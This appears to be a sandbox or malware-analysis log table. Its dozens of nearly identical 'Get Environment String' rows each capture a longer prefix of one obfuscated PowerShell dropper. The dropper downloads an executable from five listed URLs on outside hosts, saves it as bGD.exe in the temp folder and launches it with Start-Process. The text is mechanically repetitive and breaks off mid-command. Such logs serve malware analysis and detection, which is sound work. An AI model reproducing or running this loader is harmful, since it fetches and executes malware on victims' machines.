| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$E |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EH |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.s |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.sa |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.sav |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.save |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savet |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.saveto |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetof |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofi |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofil |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($n |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nL |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);S |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);St |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Sta |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Star |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start- |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-P |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Pr |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Pro |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Proc |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Proce |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Proces |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $n |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nL |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF; |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;b |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;br |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;bre |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;brea |
|
1 | |
